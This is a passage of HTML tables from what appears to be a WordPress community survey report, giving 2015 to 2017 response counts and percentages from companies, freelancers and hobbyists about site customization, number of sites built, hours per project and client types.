platform</td>\n<td>721</td>\n<td>8%</td>\n<td>137</td>\n<td>4%</td>\n<td>129</td>\n<td>4%</td>\n</tr>\n<tr>\n<td>Mostly as an application framework</td>\n<td>629</td>\n<td>7%</td>\n<td>303</td>\n<td>9%</td>\n<td>303</td>\n<td>9%</td>\n</tr>\n<tr>\n<td>Other Option</td>\n<td>145</td>\n<td>2%</td>\n<td>78</td>\n<td>2%</td>\n<td>97</td>\n<td>3%</td>\n</tr>\n</tbody>\n</table>\n<h3>How much is your average WordPress site customized from the original WordPress installation?</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress Company</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>9,054</td>\n<td></td>\n<td>3,302</td>\n<td></td>\n<td>3,473</td>\n<td></td>\n</tr>\n<tr>\n<td>A lot of work has been done, the front end is unrecognizable, but the Dashboard still looks like the usual WordPress interface.</td>\n<td>5,651</td>\n<td>62%</td>\n<td>2,025</td>\n<td>61%</td>\n<td>2,105</td>\n<td>61%</td>\n</tr>\n<tr>\n<td>There&#8217;s a different theme and some plugins have been added.</td>\n<td>2,230</td>\n<td>25%</td>\n<td>799</td>\n<td>24%</td>\n<td>905</td>\n<td>26%</td>\n</tr>\n<tr>\n<td>Not at all, it&#8217;s still pretty much the same as the original download.</td>\n<td>756</td>\n<td>8%</td>\n<td>302</td>\n<td>9%</td>\n<td>298</td>\n<td>9%</td>\n</tr>\n<tr>\n<td>You&#8217;d never know this was a WordPress installation, everything (including the admin) has been customized.</td>\n<td>417</td>\n<td>5%</td>\n<td>177</td>\n<td>5%</td>\n<td>165</td>\n<td>5%</td>\n</tr>\n</tbody>\n</table>\n<h3>Roughly how many currently active WordPress sites has your company or organization built?</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"51\" />\n<col width=\"47\" />\n<col width=\"51\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress Company</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>8,801</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>200 +</td>\n<td>1,074</td>\n<td>12%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>51 &#8211; 200</td>\n<td>1,721</td>\n<td>20%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>21 &#8211; 50</td>\n<td>1,718</td>\n<td>20%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>11 &#8211; 20</td>\n<td>1,284</td>\n<td>15%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>6 &#8211; 10</td>\n<td>1,109</td>\n<td>13%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>2 &#8211; 5</td>\n<td>1,418</td>\n<td>16%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>1</td>\n<td>390</td>\n<td>4%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>0</td>\n<td>87</td>\n<td>1%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td></td>\n<td></td>\n<td>3,358</td>\n<td></td>\n<td>3,540</td>\n<td></td>\n</tr>\n<tr>\n<td>Thousands.</td>\n<td></td>\n<td></td>\n<td>291</td>\n<td>9%</td>\n<td>331</td>\n<td>9%</td>\n</tr>\n<tr>\n<td>Hundreds.</td>\n<td></td>\n<td></td>\n<td>770</td>\n<td>23%</td>\n<td>894</td>\n<td>25%</td>\n</tr>\n<tr>\n<td>Fewer than a hundred.</td>\n<td></td>\n<td></td>\n<td>1,144</td>\n<td>34%</td>\n<td>1,177</td>\n<td>33%</td>\n</tr>\n<tr>\n<td>Just a few, but they are really great.</td>\n<td></td>\n<td></td>\n<td>926</td>\n<td>28%</td>\n<td>896</td>\n<td>25%</td>\n</tr>\n<tr>\n<td>Prefer not to answer.</td>\n<td></td>\n<td></td>\n<td>228</td>\n<td>7%</td>\n<td>242</td>\n<td>7%</td>\n</tr>\n</tbody>\n</table>\n<h3>How many person-hours (of your company&#8217;s work) does the typical site take to complete?</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"51\" />\n<col width=\"47\" />\n<col width=\"51\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress Company</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>9,091</td>\n<td></td>\n<td>3,353</td>\n<td></td>\n<td>3,522</td>\n<td></td>\n</tr>\n<tr>\n<td>More than 200</td>\n<td>939</td>\n<td>10%</td>\n<td>309</td>\n<td>9%</td>\n<td>325</td>\n<td>9%</td>\n</tr>\n<tr>\n<td>100 &#8211; 200</td>\n<td>1080</td>\n<td>12%</td>\n<td>329</td>\n<td>10%</td>\n<td>367</td>\n<td>10%</td>\n</tr>\n<tr>\n<td>60 &#8211; 100</td>\n<td>1541</td>\n<td>17%</td>\n<td>527</td>\n<td>16%</td>\n<td>513</td>\n<td>15%</td>\n</tr>\n<tr>\n<td>40 &#8211; 60</td>\n<td>1854</td>\n<td>20%</td>\n<td>583</td>\n<td>17%</td>\n<td>620</td>\n<td>18%</td>\n</tr>\n<tr>\n<td>20 &#8211; 40</td>\n<td>2066</td>\n<td>23%</td>\n<td>691</td>\n<td>21%</td>\n<td>685</td>\n<td>19%</td>\n</tr>\n<tr>\n<td>Fewer than 20</td>\n<td>1611</td>\n<td>18%</td>\n<td>479</td>\n<td>14%</td>\n<td>519</td>\n<td>15%</td>\n</tr>\n<tr>\n<td>Prefer not to answer (2016, 2017)</td>\n<td></td>\n<td></td>\n<td>436</td>\n<td>13%</td>\n<td>493</td>\n<td>14%</td>\n</tr>\n</tbody>\n</table>\n<h3>Roughly what percentage of your company or organization&#8217;s output is based around WordPress (as opposed to other platforms or software)?</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"51\" />\n<col width=\"47\" />\n<col width=\"51\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress Company</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>8,950</td>\n<td></td>\n<td>3,345</td>\n<td></td>\n<td>3,503</td>\n<td></td>\n</tr>\n<tr>\n<td>100 %</td>\n<td>1,089</td>\n<td>12%</td>\n<td>438</td>\n<td>13%</td>\n<td>480</td>\n<td>14%</td>\n</tr>\n<tr>\n<td>90 %</td>\n<td>1,043</td>\n<td>12%</td>\n<td>417</td>\n<td>12%</td>\n<td>459</td>\n<td>13%</td>\n</tr>\n<tr>\n<td>80 %</td>\n<td>955</td>\n<td>11%</td>\n<td>367</td>\n<td>11%</td>\n<td>424</td>\n<td>12%</td>\n</tr>\n<tr>\n<td>70 %</td>\n<td>831</td>\n<td>9%</td>\n<td>305</td>\n<td>9%</td>\n<td>344</td>\n<td>10%</td>\n</tr>\n<tr>\n<td>60 %</td>\n<td>534</td>\n<td>6%</td>\n<td>246</td>\n<td>7%</td>\n<td>226</td>\n<td>6%</td>\n</tr>\n<tr>\n<td>50 %</td>\n<td>973</td>\n<td>11%</td>\n<td>335</td>\n<td>10%</td>\n<td>338</td>\n<td>10%</td>\n</tr>\n<tr>\n<td>40 %</td>\n<td>613</td>\n<td>7%</td>\n<td>245</td>\n<td>7%</td>\n<td>202</td>\n<td>6%</td>\n</tr>\n<tr>\n<td>30 %</td>\n<td>877</td>\n<td>10%</td>\n<td>335</td>\n<td>10%</td>\n<td>310</td>\n<td>9%</td>\n</tr>\n<tr>\n<td>20 %</td>\n<td>806</td>\n<td>9%</td>\n<td>242</td>\n<td>7%</td>\n<td>280</td>\n<td>8%</td>\n</tr>\n<tr>\n<td>10 %</td>\n<td>1,039</td>\n<td>12%</td>\n<td>344</td>\n<td>10%</td>\n<td>348</td>\n<td>10%</td>\n</tr>\n<tr>\n<td>0 %</td>\n<td>190</td>\n<td>2%</td>\n<td>72</td>\n<td>2%</td>\n<td>92</td>\n<td>3%</td>\n</tr>\n</tbody>\n</table>\n<h3>In which of the following ways do you work with WordPress?</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress Freelancer/Hobbyist</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>17,009</td>\n<td></td>\n<td>5,221</td>\n<td></td>\n<td>5,425</td>\n<td></td>\n</tr>\n<tr>\n<td>Build/design and/or maintain websites or blogs for other people, companies, or organizations</td>\n<td>15,342</td>\n<td>34%</td>\n<td>4,795</td>\n<td>34%</td>\n<td>5,064</td>\n<td>34%</td>\n</tr>\n<tr>\n<td>Develop or customize themes</td>\n<td>10,549</td>\n<td>24%</td>\n<td>2,997</td>\n<td>21%</td>\n<td>3,021</td>\n<td>20%</td>\n</tr>\n<tr>\n<td>Host websites for customers</td>\n<td>8,142</td>\n<td>18%</td>\n<td>2,466</td>\n<td>17%</td>\n<td>2,728</td>\n<td>18%</td>\n</tr>\n<tr>\n<td>Develop or distribute plugins</td>\n<td>4,125</td>\n<td>9%</td>\n<td>1,395</td>\n<td>10%</td>\n<td>1,416</td>\n<td>9%</td>\n</tr>\n<tr>\n<td>Provide educational resources to help others to use WordPress</td>\n<td>3,276</td>\n<td>7%</td>\n<td>1,187</td>\n<td>8%</td>\n<td>1,308</td>\n<td>9%</td>\n</tr>\n<tr>\n<td>Sponsor and/or attend WordCamps</td>\n<td>1,559</td>\n<td>4%</td>\n<td>648</td>\n<td>5%</td>\n<td>724</td>\n<td>5%</td>\n</tr>\n<tr>\n<td>Contribute bug reports and/or patches to WordPress core</td>\n<td>1,107</td>\n<td>2%</td>\n<td>381</td>\n<td>3%</td>\n<td>393</td>\n<td>3%</td>\n</tr>\n<tr>\n<td>Other Option</td>\n<td>389</td>\n<td>1%</td>\n<td>243</td>\n<td>2%</td>\n<td>299</td>\n<td>2%</td>\n</tr>\n</tbody>\n</table>\n<h3>How would you describe the business of your typical client(s)?</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress Freelancer/Hobbyist</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>16,863</td>\n<td></td>\n<td>5,151</td>\n<td></td>\n<td>5,353</td>\n<td></td>\n</tr>\n<tr>\n<td>Small business</td>\n<td>14,185</td>\n<td>35%</td>\n<td>4,342</td>\n<td>35%</td>\n<td>4,622</td>\n<td>36%</td>\n</tr>\n<tr>\n<td>Individual</td>\n<td>8,513</td>\n<td>21%</td>\n<td>2,581</td>\n<td>21%</td>\n<td>2,583</td>\n<td>20%</td>\n</tr>\n<tr>\n<td>Non-profit</td>\n<td>6,585</td>\n<td>16%</td>\n<td>2,004</td>\n<td>16%</td>\n<td>2,113</td>\n<td>16%</td>\n</tr>\n<tr>\n<td>Website development (sub-contracting)</td>\n<td>4,301</td>\n<td>11%</td>\n<td>1,258</td>\n<td>10%</td>\n<td>1,216</td>\n<td>9%</td>\n</tr>\n<tr>\n<td>Education</td>\n<td>3,458</td>\n<td>8%</td>\n<td>1,049</td>\n<td>8%</td>\n<td>1,139</td>\n<td>9%</td>\n</tr>\n<tr>\n<td>Large business or Enterprise</td>\n<td>2,391</td>\n<td>6%</td>\n<td>805</td>\n<td>6%</td>\n<td>857</td>\n<td>7%</td>\n</tr>\n<tr>\n<td>Government</td>\n<td>1,150</td>\n<td>3%</td>\n<td>300</td>\n<td>2%</td>\n<td>329</td>\n<td>3%</td>\n</tr>\n<tr>\n<td>Other Option</td>\n<td>173</td>\n<td>0%</td>\n<td>101</td>\n<td>1%</td>\n<td>99</td>\n<td>1%</td>\n</tr>\n</tbody>\n</table>\n<h3>How do you use WordPress in your development?</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress Freelancer/Hobbyist</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>16,768</td>\n<td></td>\n<td>5,145</td>\n<td></td>\n<td>5,372</td>\n<td></td>\n</tr>\n<tr>\n<td>Mostly as a content management system (CMS)</td>\n<td>11,754</td>\n<td>70%</td>\n<td>3,641</td>\n<td>71%</td>\n<td>3,959</td>\n<td>74%</td>\n</tr>\n<tr>\n<td>About half the time as a blogging platform and half the time as a CMS</td>\n<td>2,825</td>\n<td>17%</td>\n<td>812</td>\n<td>16%</td>\n<td>721</td>\n<td>13%</td>\n</tr>\n<tr>\n<td>Mostly as an application framework</td>\n<td>1,012</td>\n<td>6%</td>\n<td>343</td>\n<td>7%</td>\n<td>344</td>\n<td>6%</td>\n</tr>\n<tr>\n<td>Mostly as a blogging platform</td>\n<td>992</td>\n<td>6%</td>\n<td>246</td>\n<td>5%</td>\n<td>226</td>\n<td>4%</td>\n</tr>\n<tr>\n<td>Other Option</td>\n<td>185</td>\n<td>1%</td>\n<td>105</td>\n<td>2%</td>\n<td>122</td>\n<td>2%</td>\n</tr>\n</tbody>\n</table>\n<h3>How much is your average WordPress site customized from the original WordPress installation?</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress Freelancer/Hobbyist</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>16,699</td>\n<td></td>\n<td>5,131</td>\n<td></td>\n<td>5,317</td>\n<td></td>\n</tr>\n<tr>\n<td>A lot of work has been done, the front end is unrecognizable, but the Dashboard still looks like the usual WordPress interface.</td>\n<td>9,457</td>\n<td>57%</td>\n<td>2,837</td>\n<td>55%</td>\n<td>2,998</td>\n<td>56%</td>\n</tr>\n<tr>\n<td>There&#8217;s a different theme and some plugins have been added.</td>\n<td>5,526</td>\n<td>33%</td>\n<td>1,694</td>\n<td>33%</td>\n<td>1,781</td>\n<td>34%</td>\n</tr>\n<tr>\n<td>Not at all, it&#8217;s still pretty much the same as the original download.</td>\n<td>977</td>\n<td>6%</td>\n<td>341</td>\n<td>7%</td>\n<td>310</td>\n<td>6%</td>\n</tr>\n<tr>\n<td>You&#8217;d never know this was a WordPress installation, everything (including the admin) has been customized.</td>\n<td>739</td>\n<td>4%</td>\n<td>261</td>\n<td>5%</td>\n<td>228</td>\n<td>4%</td>\n</tr>\n</tbody>\n</table>\n<h3>How many currently active WordPress sites have you built? (2015) / Roughly how many currently active WordPress sites have you built? (2016, 2017)</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress Freelancer/Hobbyist</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>16,690</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>200 +</td>\n<td>514</td>\n<td>3%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>51 &#8211; 200</td>\n<td>1,728</td>\n<td>10%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>21 &#8211; 50</td>\n<td>3,000</td>\n<td>18%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>11 &#8211; 20</td>\n<td>3,146</td>\n<td>19%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>6 &#8211; 10</td>\n<td>3,405</td>\n<td>20%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>2 &#8211; 5</td>\n<td>3,838</td>\n<td>23%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>1</td>\n<td>698</td>\n<td>4%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>0</td>\n<td>361</td>\n<td>2%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td></td>\n<td></td>\n<td>5,165</td>\n<td></td>\n<td>5367</td>\n<td></td>\n</tr>\n<tr>\n<td>Thousands.</td>\n<td></td>\n<td></td>\n<td>110</td>\n<td>2%</td>\n<td>104</td>\n<td>2%</td>\n</tr>\n<tr>\n<td>Hundreds.</td>\n<td></td>\n<td></td>\n<td>603</td>\n<td>12%</td>\n<td>713</td>\n<td>13%</td>\n</tr>\n<tr>\n<td>Fewer than a hundred.</td>\n<td></td>\n<td></td>\n<td>2,264</td>\n<td>44%</td>\n<td>2,457</td>\n<td>46%</td>\n</tr>\n<tr>\n<td>Just a few, but they are really great.</td>\n<td></td>\n<td></td>\n<td>1,871</td>\n<td>36%</td>\n<td>1,813</td>\n<td>34%</td>\n</tr>\n<tr>\n<td>Prefer not to answer.</td>\n<td></td>\n<td></td>\n<td>319</td>\n<td>6%</td>\n<td>280</td>\n<td>5%</td>\n</tr>\n</tbody>\n</table>\n<h3>Roughly what percentage of your working time is spent working with WordPress?</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress Freelancer/Hobbyist</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>16,658</td>\n<td></td>\n<td>5,039</td>\n<td></td>\n<td>5,241</td>\n<td></td>\n</tr>\n<tr>\n<td>100 %</td>\n<td>949</td>\n<td>6%</td>\n<td>459</td>\n<td>9%</td>\n<td>461</td>\n<td>9%</td>\n</tr>\n<tr>\n<td>90 %</td>\n<td>1,300</td>\n<td>8%</td>\n<td>527</td>\n<td>10%</td>\n<td>540</td>\n<td>10%</td>\n</tr>\n<tr>\n<td>80 %</td>\n<td>1,784</td>\n<td>11%</td>\n<td>637</td>\n<td>13%</td>\n<td>711</td>\n<td>14%</td>\n</tr>\n<tr>\n<td>70 %</td>\n<td>1,850</td>\n<td>11%</td>\n<td>608</td>\n<td>12%</td>\n<td>627</td>\n<td>12%</td>\n</tr>\n<tr>\n<td>60 %</td>\n<td>1,313</td>\n<td>8%</td>\n<td>438</td>\n<td>9%</td>\n<td>465</td>\n<td>9%</td>\n</tr>\n<tr>\n<td>50 %</td>\n<td>2,095</td>\n<td>13%</td>\n<td>612</td>\n<td>12%</td>\n<td>639</td>\n<td>12%</td>\n</tr>\n<tr>\n<td>40 %</td>\n<td>1,438</td>\n<td>9%</td>\n<td>391</td>\n<td>8%</td>\n<td>384</td>\n<td>7%</td>\n</tr>\n<tr>\n<td>30 %</td>\n<td>2,076</td>\n<td>12%</td>\n<td>530</td>\n<td>11%</td>\n<td>511</td>\n<td>10%</td>\n</tr>\n<tr>\n<td>20 %</td>\n<td>1,743</td>\n<td>10%</td>\n<td>445</td>\n<td>9%</td>\n<td>429</td>\n<td>8%</td>\n</tr>\n<tr>\n<td>10 %</td>\n<td>1,819</td>\n<td>11%</td>\n<td>342</td>\n<td>7%</td>\n<td>419</td>\n<td>8%</td>\n</tr>\n<tr>\n<td>0 %</td>\n<td>291</td>\n<td>2%</td>\n<td>52</td>\n<td>1%</td>\n<td>55</td>\n<td>1%</td>\n</tr>\n</tbody>\n</table>\n<h3>How many hours of your work does the typical site take to complete? (2015) / How many hours of work does your typical WordPress project take to launch? (2016, 2017)</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"51\" />\n<col width=\"47\" />\n<col width=\"51\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress Freelancer/Hobbyist</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>16,670</td>\n<td></td>\n<td>5,164</td>\n<td></td>\n<td>5,378</td>\n<td></td>\n</tr>\n<tr>\n<td>More than 200</td>\n<td>503</td>\n<td>3%</td>\n<td>222</td>\n<td>4%</td>\n<td>245</td>\n<td>5%</td>\n</tr>\n<tr>\n<td>100 &#8211; 200</td>\n<td>973</td>\n<td>6%</td>\n<td>386</td>\n<td>7%</td>\n<td>393</td>\n<td>7%</td>\n</tr>\n<tr>\n<td>60 &#8211; 100</td>\n<td>2,277</td>\n<td>14%</td>\n<td>788</td>\n<td>15%</td>\n<td>815</td>\n<td>15%</td>\n</tr>\n<tr>\n<td>40 &#8211; 60</td>\n<td>3,896</td>\n<td>23%</td>\n<td>1,153</td>\n<td>22%</td>\n<td>1,216</td>\n<td>23%</td>\n</tr>\n<tr>\n<td>20 &#8211; 40</td>\n<td>6,068</td>\n<td>36%</td>\n<td>1,487</td>\n<td>29%</td>\n<td>1,582</td>\n<td>29%</td>\n</tr>\n<tr>\n<td>Fewer than 20</td>\n<td>2,953</td>\n<td>18%</td>\n<td>712</td>\n<td>14%</td>\n<td>751</td>\n<td>14%</td>\n</tr>\n<tr>\n<td>Prefer not to answer</td>\n<td></td>\n<td></td>\n<td>418</td>\n<td>8%</td>\n<td>376</td>\n<td>7%</td>\n</tr>\n</tbody>\n</table>\n<h3>Which of the following have you done with WordPress?</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" /> </colgroup>\n</table>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress Professional (Company/Freelancer/Hobbyist)</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>20,687</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>I’ve written a theme from scratch.</td>\n<td>11,894</td>\n<td>25%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>I’ve written a plugin.</td>\n<td>9,719</td>\n<td>21%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>I&#8217;ve answered a question in the WordPress forum.</td>\n<td>8,805</td>\n<td>19%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>I&#8217;ve attended a WordPress meetup.</td>\n<td>4,062</td>\n<td>9%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>I&#8217;ve submitted a WordPress bug report.</td>\n<td>4,062</td>\n<td>9%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>I&#8217;ve attended a WordCamp.</td>\n<td>3,571</td>\n<td>8%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>I&#8217;ve contributed to WordPress documentation.</td>\n<td>1,778</td>\n<td>4%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Other 